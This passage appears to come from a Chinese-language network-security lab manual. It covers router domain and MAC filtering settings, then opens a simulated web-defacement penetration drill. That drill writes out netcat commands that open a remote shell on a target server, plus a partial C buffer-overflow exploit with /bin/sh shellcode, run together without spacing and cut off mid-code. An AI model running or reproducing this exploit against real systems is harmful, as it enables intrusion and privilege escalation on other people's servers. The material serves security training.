第十三步：.單擊“安全設置”→“防火墻設置”，在窗口中同時選中“開啟防火墻”和“域名過濾”復選框，單擊“保存”按鈕。如果先選中“域名過濾”復選框，顯示提示信息“開啟域名過濾，必須開啟防火墻”。如下圖所示。第十四步：單擊“安全設置”→“域名過濾”，顯示“域名過濾”窗口，如下圖所示。

第十五步：單擊“添加新條目”按鈕，輸入生效時間和限制訪問的網(wǎng)站域名。是在8：30到18：00之間拒絕訪問網(wǎng)站的設置，如下圖所示。第十六步：單擊“保存”按鈕保存設置，一條新規(guī)則添加成功，如下圖所示界面。

第十七步：單擊“安全設置”→“MAC地址過濾”，顯示“域名過濾”窗口，如下圖所示。第十八步：單擊“添加新條目”按鈕，提示用戶根據(jù)實驗任務在“MAC地址”文本框中，鍵入計算機的MAC地址，在“描述”文本框中鍵入該計算機的描述信息，在“狀態(tài)”下拉列表框中選擇是否生效。如禁止MAC地址為00-E0-4C-00-07-BE的計算機訪問Internet的設置，如下圖所示。

第十九步：單擊“保存”按鈕保存設置，一條新規(guī)則添加完成，如下圖所示。

5項目5典型滲透測試演練5.1任務1、完成web首頁篡改滲透測試第一步：點擊“項目5典型滲透測試演練”目錄下的“任務1、完成web首頁篡改滲透測試”目錄，點擊后界面如下圖所示：第二步：從設備庫中選擇PC機，拖放至桌子上，如下圖所示。

第三步：雙擊桌面上的IE圖標，打開瀏覽器，在地址欄中輸入要攻擊服務器的地址（這里輸入），點擊瀏覽器上的按鈕，打開如下圖所示界面。第四步：打開命令行界面，單擊“開始”按鈕，打開如下圖所示界面。

第五步：選擇“運行”，打開下圖所示界面。第六步：文本框中輸入“cmd”，“確定”按鈕變黑色，單擊“確定”打開下圖所示界面。第七步：在上圖界面中連續(xù)輸入指令，一行輸入一條指令，以回車鍵換行，連續(xù)輸入的指令如下。d:nc.exe80GET/abcdefgHTTP/1.0exbsd.exe–t80nc1129idwpwduname-acd/tmppwdcat>ex.c<<_EOF#include<stdio.h>#include<stdlib.h>#include<string.h>#include<unistd.h>#defineBOF_LEN1260externchar**environ;intmain(void){charbuf[BOF_LEN];char*ptr;char*arg[4];unsignedintret=0xbfbfeead;charshellcode[]="\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89""\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd""\x80\xe8\xe4\xff\xff\xff/bin/sh";charenvshell[4096];memset(envshell,0x90,4096);memcpy(envshell+4096-strlen(shellcode),shellcode,strlen(shellcode));envshell[4096]=0x0;memcpy(en